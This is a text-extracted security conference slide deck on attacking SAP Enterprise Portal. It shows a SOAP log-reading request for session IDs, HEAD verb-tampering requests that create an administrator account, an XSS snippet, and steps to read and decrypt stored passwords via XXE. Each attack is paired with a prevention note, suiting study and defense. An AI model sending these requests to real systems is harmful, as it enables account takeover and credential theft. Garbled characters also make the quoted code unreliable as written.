74
Invest in security to secure investments Breaking SAP Portal Alexander Polyakov CTO ERPScan Dmitry Chastuchin Principal Researcher ERPScan

Breaking SAP portal (DeepSec)

  • Upload
    erpscan

  • View
    43

  • Download
    5

Embed Size (px)

Citation preview

Invest  in  security  to  secure  investments  

Breaking  SAP  Portal  

Alexander  Polyakov  CTO  ERPScan  Dmitry  Chastuchin  -­‐  Principal  Researcher  ERPScan  

About  ERPScan  

•  The   only   360-­‐degree   SAP   Security   solu8on   -­‐   ERPScan   Security  Monitoring  Suite  for  SAP  

•  Leader  by  the  number  of  acknowledgements  from  SAP  (  150+  )  •  60+  presentaHons  key  security  conferences  worldwide  •  25  Awards  and  nominaHons  •  Research  team  -­‐  20  experts  with  experience  in    different  areas  

of  security  •  Headquarters  in  Palo  Alto  (US)  and  Amsterdam  (EU)      

2  

Agenda  

 

•  Say  hello  to  SAP  Portal  •  Breaking  Portal  through  SAP  Services  •  Breaking  Portal  through  J2EE  Engine  •  Breaking  Portal  through  Portal  issues  •  Conclusion  

3  

SAP  

•  The  most  popular  business  applica8on  •  More  than  180000  customers  worldwide    •  74%  of  Forbes  500  run  SAP  

4  

Meet  sapscan.com  

hUp://erpscan.com/wp-­‐content/uploads/2012/06/SAP-­‐Security-­‐in-­‐figures-­‐a-­‐global-­‐survey-­‐2007-­‐2011-­‐final.pdf    

5  

Say  hello  to  Portal  

•  Point  of  web  access  to  SAP  systems  •  Point  of  web  access  to  other  corporate  systems  •  Way  for  aUackers  to  get  access  to  SAP  from  the  Internet  •  ~17  Portals  in  Switzerland,  according  to  Shodan  •  ~11  Portals  in  Switzerland,  according  to  Google  

6  

EP  architecture  

7  

Okay,  okay.  SAP  Portal  is  important,  and  it  has  many  links  to  other  modules.  So  what?  

8  

SAP  Management  Console  

9  

SAP  Management  Console  

•  SAP  MC  provides  a  common  framework  for  centralized  system  management  

•  Allowing  to  see  the  trace  and  log  messages  •  Using  JSESSIONID  from  logs,  aUacker  can  log  into  Portal    

 What  we  can  find  into  logs?     Right!  File  userinterface.log  contains  calculated  JSESIONID  

But…aUacker  must  have  creden8al  for  reading  log  file!  

Wrong!    10  

SAP  Management  Console  

<?xml  version="1.0"?>  <SOAP-­‐ENV:Envelope  xmlns:SOAP-­‐ENV="hUp://schemas.xmlsoap.org/soap/envelope/"  xmlns:xsi="hUp://

www.w3.org/2001/XMLSchema-­‐instance"  xmlns:xs="hUp://www.w3.org/2001/XMLSchema">  <SOAP-­‐ENV:Header>          <sapsess:Session  xmlns:sapsess="hUp://www.sap.com/webas/630/soap/features/session/">          <enableSession>true</enableSession>  </sapsess:Session>  </SOAP-­‐ENV:Header>  <SOAP-­‐ENV:Body>          <ns1:ReadLogFile  xmlns:ns1="urn:SAPControl">                  <filename>j2ee/cluster/server0/log/system/userinterface.log</filename>                  <filter/>                  <language/>                  <maxentries>%COUNT%</maxentries>                  <statecookie>EOF</statecookie>          </ns1:ReadLogFile>  </SOAP-­‐ENV:Body>  </SOAP-­‐ENV:Envelope>  

11  

PrevenHon  

•       Don’t  use  TRACE_LEVEL  =  3  in  produc8on  systems  or  delete  traces    •       Install  notes  927637  and  1439348  

         

hUp://help.sap.com/saphelp_nwpi71/helpdata/en/d6/49543b1e49bc1fe10000000a114084/frameset.htm    

12  

Single-­‐Sign  On  

13  

SSO  (old  but  sHll  works)  

•  SAP  implements  SSO  using  the  Header  Variable  Login  Module  

creden8als  

check  

okay  cookie  

AUacker  

header_auth  

cookie  

tnx  Mariano  ;)    

14  

PrevenHon  

•   Implement  proper  network  filters  to  avoid  direct  connec8ons  to  SAP    •   J2EE  Engine.  If  you  use  it  for  Windows  authen8ca8on,  switch  to  SPNegoLoginModule  

hUp://help.sap.com/saphelp_nw73ehp1/helpdata/en/d0/a3d940c2653126e10000000a1550b0/frameset.htm    

15  

SAP  NetWeaver  J2EE  

16  

Access  control  

   Web  Dynpro                                          -­‐  programma8c      Portal  iViews                                        -­‐  programma8c      J2EE  Web  apps                                -­‐  declara8ve  

ProgrammaHc    By  UME  

DeclaraHve      By  WEB.XML  

17  

DeclaraHve  access  control  

•  The  central  en8ty  in  the  J2EE  authoriza8on  model  is  the  security  role.  

•  Programmers  define  the  applica8on-­‐specific  roles  in  the  J2EE  deployment  descriptor  

web.xml      web-­‐j2ee-­‐engine.xml  

18  

19  

Verb  Tampering  

web.xml  

<servlet>          <servlet-­‐name>Cri8calAc8on</servlet-­‐name>          <servlet-­‐class>com.sap.admin.Cri8cal.Ac8on</servlet-­‐class>          </servlet>  <servlet-­‐mapping>              <servlet-­‐name>Cri8calAc8on</</servlet-­‐name>              <url-­‐paUern>/admin/cri8cal</url-­‐paUern>      </servlet-­‐mapping  <security-­‐constraint>  <web-­‐resource-­‐collec8on>  <web-­‐resource-­‐name>Restrictedaccess</web-­‐resource-­‐name>  <url-­‐paUern>/admin/*</url-­‐paUern>  <hUp-­‐method>GET</hUp-­‐method>  </web-­‐resource-­‐collec8on>  <auth-­‐constraint>            <role-­‐name>administrator</role-­‐name>    </auth-­‐constraint>  </security-­‐constraint>  

20  

Verb  Tampering    

•  If  we  are  trying  to  get  access  to  an  applica8on  using  GET  –  we  need  a  login:pass  and  administrator  role  

•  What  if  we  try  to  get  access  to  applica8on  using  HEAD  instead  GET?  

•  PROFIT!  

•  Did  U  know  about  ctc?  

21  

Verb  Tampering    

Need  Admin  account  in  SAP  Portal?    Just  send  two  HEAD  requests  

 •  Create  new  user  blabla:blabla    HEAD  /ctc/ConfigServlet?param=com.sap.ctc.u8l.UserConfig;CREATEUSER;USERNAME=blabla,PASSWORD=blabla      

•  Add  user  blabla  to  group  Administrators    HEAD  /ctc/ConfigServlet?param=com.sap.ctc.u8l.UserConfig;ADD_USER_TO_GROUP;USERNAME=blabla,GROUPNAME=Administrators      

Works  when  UME  uses  JAVA  database    

 

22  

PrevenHon  

• Install  SAP  notes  1503579,1616259    • Install  other  SAP  notes  about  Verb  Tampering      • Scan  applica8ons  with  ERPScan  WEB.XML  checker    • Disable  the  applica8ons  that  are  not  necessary    

23  

24  

Invoker  servlet  

web.xml  

<servlet>          <servlet-­‐name>Cri>calAc>on</servlet-­‐name>          <servlet-­‐class>com.sap.admin.Cri>cal.Ac>on</servlet-­‐class>          </servlet>  <servlet-­‐mapping>              <servlet-­‐name>Cri>calAc>on</</servlet-­‐name>              <url-­‐paBern>/admin/cri>cal</url-­‐paBern>      </servlet-­‐mapping  <security-­‐constraint>  <web-­‐resource-­‐collec>on>  <web-­‐resource-­‐name>Restrictedaccess</web-­‐resource-­‐name>  <url-­‐paBern>/admin/*</url-­‐paBern>  <hBp-­‐method>GET</hBp-­‐method>  <hBp-­‐method>HEAD</hBp-­‐method>  </web-­‐resource-­‐collec>on>  <auth-­‐constraint>            <role-­‐name>administrator</role-­‐name>    </auth-­‐constraint>  </security-­‐constraint>  

GET  /admin/cri8cal/Cri>calAc>on  

GET  /servlet/com.sap.admin.Cri8cal.Ac8on  

25  

Invoker  Servlet  

•  Want  to  execute  an  OS  command  on  J2EE  server  remotely?  •  Maybe  upload  a  backdoor  in  a  Java  class?  •  Or  sniff  all  traffic  ?  

SHll  remember  ctc?  

26  

Invoker  Servlet  

27  

PrevenHon  

•   Update  to  the  latest  patch  1467771,  1445998    • “EnableInvokerServletGlobally”    must  be  “false”      •   Check  all  WEB.XML  files  with  ERPScan  WEBXML  checker    

28  

So,  where  is  Portal?  

29  

SAP  Portal  

•  User  access  rights  to  objects  are  in  the  Portal  Content  Directory  (PCD)  

•  Based  on  ACL  •  2  types  of  access:  

–  (design  8me)  for  administrators  –  (run8me)  for  users  

30  

Portal    Permission  Levels  

31  

End  User  permission  

The  objects  where  end  user  permission  is  enabled  affect  the  following  areas  in  Portal:  –  All  Portal  Catalog  obj  with  end  user  permission    –  Authorized  Portal  users  may  access  restricted      Portal  components  by  URL  if  they  are  granted  permission  in  the  appropriate  security  zone.  

32  

Administrator  permission  

•  Owner  =  full  control  +  modify  permissions  •  Full  control  =  read/write  +  delete  obj  •  Read/Write  =  read+write+edit  proper8es+  add/rem  child  •  Write  (folders  only)  =  create  objects  •  Read  =  view  obj+create  instances        (delta  links  and  copies)  

•  None  =  access  not  granted  

33  

Role  Assigner  permission  

•  The  Role  Assigner  permission  seyng  is  available  for  role  objects  •  It  allows  you  to  determine  which  Portal  users  are  permiUed  to  

assign  other  users,  groups,  or  roles  to  the  role  principle  using  the  Role  Assignment  tool  

34  

Security  Zones    

•  Security  zones  allow  the  system  administrator  to  control  which  Portal  components  and  Portal  services  a  Portal  user  can  launch  

•  A  security  zone  specifies  the  vendor  ID,  the  security  area,  and  safety  level  for  each  Portal  component  and  Portal  service  

35  

Why?  To  group  mul>ple  iViews  easily  like  files  in  directories    

Security  Zones    

•  The  security  zone  is  defined  in  a  Portal  applica8on  descriptor  XML  file  portalapps.xml  

•  A  Portal  component  or  service  can  only  belong  to  one  security  zone  

•  Zones  allows  the  administrator  to  assign  permissions  to  a  safety  level,  instead  of  assigning  them  directly  

36  

Why?  To  group  mul>ple  iViews  easily  like  files  in  directories    

37  

We  can  get  access  to  Portal  iViews    using  direct  URL:  

 /irj/servlet/prt/portal/prtroot/<iView_ID>  

 And  only  Security  Zone  rights  will  be  checked    

Security  Zones    

•  So,  SecZones  offer  an  extra,  but  op8onal,  layer  of  code-­‐level  security  to  iViews  –  User-­‐>  check  ”end  user”  permission  to  the  role-­‐>  view  iView  –  User-­‐>  check  ”end  user”  permission  to  the  role-­‐>  check  ”end  user”  permission  to  the  SecZone  -­‐>  view  iView  

 By  default,  this  func8onality  is  disabled  

38  

39  

So  I  wonder  how  many  Portal  applica8ons  with  No\Low  Safety  

exist?  

Safety  Levels  for  Security  Zone  

•  No  Safety  –  Anonymous  users  are  permiUed  to  access  portal  components  defined  in  

the  security  zone.  •  Low  Safety  

–  A  user  must  be  at  least  an  authen8cated  portal  user  to  access  portal  components  defined  in  the  security  zone.  

•  Medium  Safety  –  A  user  must  be  assigned  to  a  par8cular  portal  role  that  is  authorized  to  

access  portal  components  defined  in  the  security  zone  •  High  Safety  

–  A  user  must  be  assigned  to  a  portal  role  with  higher  administra8ve  rights  that  is  authorized  to  access  portal  components  defined  in  the  security  zone.  

40  

 Zones  with  no  safety  

Many  custom  applica8ons  with  low  security  level  zone  

41  

PrevenHon  

Check  security  zones  permissions    

• hUp://help.sap.com/saphelp_nw70/helpdata/en/25/85de55a94c4b5fa7a2d74e8ed201b0/frameset.htm  • hUp://help.sap.com/saphelp_nw70/helpdata/en/f6/2604db05fd11d7b84200047582c9f7/frameset.htm  

42  

SAP  Portal  

•  Web  based  services  •  All  OWASP  TOP10  actual    

–  XSS  –  Phishing  –  Traversal  –  XXE  –  …    

43  

44  

EPCF  

XSS  

•  Many  XSSs  in  Portal  

•  But  some8mes  “hUponly”  •  But  when  we  exploit  XSS,  we  can  use  the  features  of  SAP  Portal  

45  

EPCF  

       EPCF  provides  a  JavaScript  API  designed  for  the  client-­‐side  communica8on  between  portal  components  and  the  portal  core  framework  

•  Enterprise  Portal  Client  Manager  (EPCM)  •  iViews  can  access  the  EPCM  object  from  every  portal  page  

or  IFrame  •  Every  iView  contains  the  EPCM  object  •  For  example,  EPCF  used  for  transient  user  data  buffer  for  

iViews  

<SCRIPT>      alert(EPCM.loadClientData("urn:com.sap.myObjects",  "person");  </SCRIPT>  

46  

PrevenHon  

 Install  SAP  note  1656549  

47  

KM  Phishing  

SAP  Knowledge  Management  may  be  used  to  create  phishing  pages  

48  

49  

FIX  

Directory  traversal  

50  

Directory  traversal  fix  bypass  

51  

PrevenHon  

Install  SAP  note  1630293  

52  

53  

Cut  the  Crap,    Show  Me  the  Hack  

Breaking  SAP  Portal  

•  Found  a  file  in  the  OS  of  SAP  Portal  with  the  encrypted  passwords  for  administra8on  and  DB  

•  Found  a  file  in  the  OS  of  SAP  Portal  with  keys  to  decrypt  passwords  

•  Found  a  vulnerability  (another  one  ;))  which  allows  reading  the  files  with  passwords  and  keys  

•  Decrypt  passwords  and  log  into  Portal  •  PROFIT!  

54  

Read  file  

 How  we  can  read  the  file?    

–  Directory  Traversal  –  OS  Command  execute    –  XML  External  En8ty  (XXE)  

55  

XXE  in  Portal  

56  

XXE  in  Portal  

57  

XXE  

Error  based  XXE  

58  

Breaking  SAP  Portal  

•  Ok,  we  can  read  files  •  Where  are  the  passwords?  •  The  SAP  J2EE  Engine  stores  the  database  user  SAP<SID>DB;  its  

password  is  here:  \usr\sap\<SID>\SYS\global\security\data\SecStore.proper>es    

59  

Where  are  the  passwords?  (config.proper4es)  

 rdbms.maximum_connec8ons=5  system.name=TTT  secstorefs.keyfile=/oracle/TTT/sapmnt/global/security/data/

SecStore.key  secstorefs.secfile=/oracle/TTT/sapmnt/global/security/data/

SecStore.proper8es  secstorefs.lib=/oracle/TTTsapmnt/global/security/lib  rdbms.driverLoca8on=/oracle/client/10x_64/instantclient/

ojdbc14.jar  rdbms.connec8on=jdbc/pool/TTT  rdbms.ini8al_connec8ons=1  

60  

Where  are  the  passwords?  (config.proper4es)  

 rdbms.maximum_connec8ons=5  system.name=TTT  secstorefs.keyfile=/oracle/TTT/sapmnt/global/security/data/SecStore.key  secstorefs.secfile=/oracle/TTT/sapmnt/global/security/data/SecStore.proper8es  secstorefs.lib=/oracle/TTTsapmnt/global/security/lib  rdbms.driverLoca8on=/oracle/client/10x_64/instantclient/ojdbc14.jar  rdbms.connec8on=jdbc/pool/TTT  rdbms.ini8al_connec8ons=1  

61  

62  

But  where  is  the  key?  

SecStore.properHes  

63  

$internal/version=Ni4zFF4wMSeaseforCCMxegAfx  admin/host/TTT=7KJuOPPs/+u

+14jM7uy7cy7exrZuYvevkSrPxwueur2445yxgBS  admin/password/TTT=7KJuOPPs/+uv+14j56vDc7M7v7dytbGbkgqDp

+QD04b0Fh  jdbc/pool/TTT=7KJuOPPs/+u5jM6s1cvvgQ1gzFvarxuUzEJTHTJI0VGegH  admin/port/TTT=7KJuOPPs/+u+1j4vD1cv6ZTvd336rzEd7267Rwr4ZUgRTQ  $internal/check=BJRrz�eUA+bw4XCzdz16zX78u�t  $internal/mode=encrypted  admin/user/TTT=7KJuOPPs/+u

+14j6s14sTxXU3ONl3rL6N7yssV75eC6/5S3E  

config.properHes  

 rdbms.maximum_connec8ons=5  system.name=TTT  secstorefs.keyfile=/oracle/TTT/sapmnt/global/security/data/SecStore.key  secstorefs.secfile=/oracle/TTT/sapmnt/global/security/data/SecStore.proper8es  secstorefs.lib=/oracle/TTTsapmnt/global/security/lib  rdbms.driverLoca8on=/oracle/client/10x_64/instantclient/ojdbc14.jar  rdbms.connec8on=jdbc/pool/TTT  rdbms.ini8al_connec8ons=1  

64  

Get  the  password  

•  We  have  an  encrypted  password  •  We  have  a  key  to  decrypt  it  

We  got  the  J2EE  admin  and  JDBC  login:password!  

65  

PrevenHon  

•   Install  SAP  note  1619539  •   Restrict  read  access  to  files  SecStore.proper>es  and  SecStore.key  

66  

Portal  post  exploitaHon  

•  Lot  of  links  to  other  systems  in  corporate  LAN  •  Using  SSRF,  aUackers  can  get  access  to  these  systems  

What  is  SSRF?  

67  

SSRF  History:  Basics  

•  We  send  Packet  A  to  Service  A  •  Service  A  ini8ates  Packet  B  to  service  B  •  Services  can  be  on  the  same  or  different  hosts  •  We  can  manipulate  some  fields  of  packet  B  within  packet  A  •  Various  SSRF  aUacks  depend  on  how  many  fields  we  can  

control  on  packet  B    

Packet  A  

Packet  B  

68  

ParHal  Remote  SSRF:    HTTP  afacks  on  other  services  

HTTP  Server    Corporate  network  

Direct  aUack      GET  /vuln.jsp    

SSRF  AUack    

SSRF  AUack    Get  /vuln.jst    

A   B  

69  

Gopher  uri  scheme  

•  Using  gopher://  uri  scheme,  it  is  possible  to  send  TCP  packets  –   Exploit  OS  vulnerabili8es  –   Exploit  old  SAP  applicaHon  vulnerabiliHes    –   Bypass  SAP  security  restric8ons  –   Exploit  vulnerabili8es  in  local  services  

 More  info  in  our  BH2012  presenta8on:  SSRF  vs.  Business  Cri>cal  Applica>ons  

hUp://erpscan.com/wp-­‐content/uploads/2012/08/SSRF-­‐vs-­‐Businness-­‐cri8cal-­‐applica8ons-­‐whitepaper.pdf  

70  

Portal  post-­‐exploitaHon  

71  

Conclusion  

It  is  possible  to  protect  yourself  from  these  kinds  of  issues,    and  we  are  working  close  with  SAP  to  keep  customers  secure  

SAP  Guides  

It’s  all  in  your  hands  

Regular  security  assessments  

ABAP  code  review  

Monitoring  technical  security  

SegregaHon  of  DuHes  

72  

Future  work  

 Many  of  the  researched  issues  cannot  be  disclosed  now  because  of   our   good   rela>onship   with   SAP   Product   Security   Response  Team,  whom  I  would   like  to  thank  for  coopera>on.  However,   if  you  want  to  be  the  first  to  see  new  aBacks  and  demos,  follow  us  at  @erpscan  and  aBend  future  presenta>ons:  

 •  December  6  –  BlackHat  (UAE,  Abu  Dhabi)  •  December  13  –  Syscan  360  (Beijing,  China)                  

73  

   

74  

Web:    www.erpscan.com  e-­‐mail:    [email protected]                                    TwiBer:  @erpscan  

     @sh2kerr                @_chipik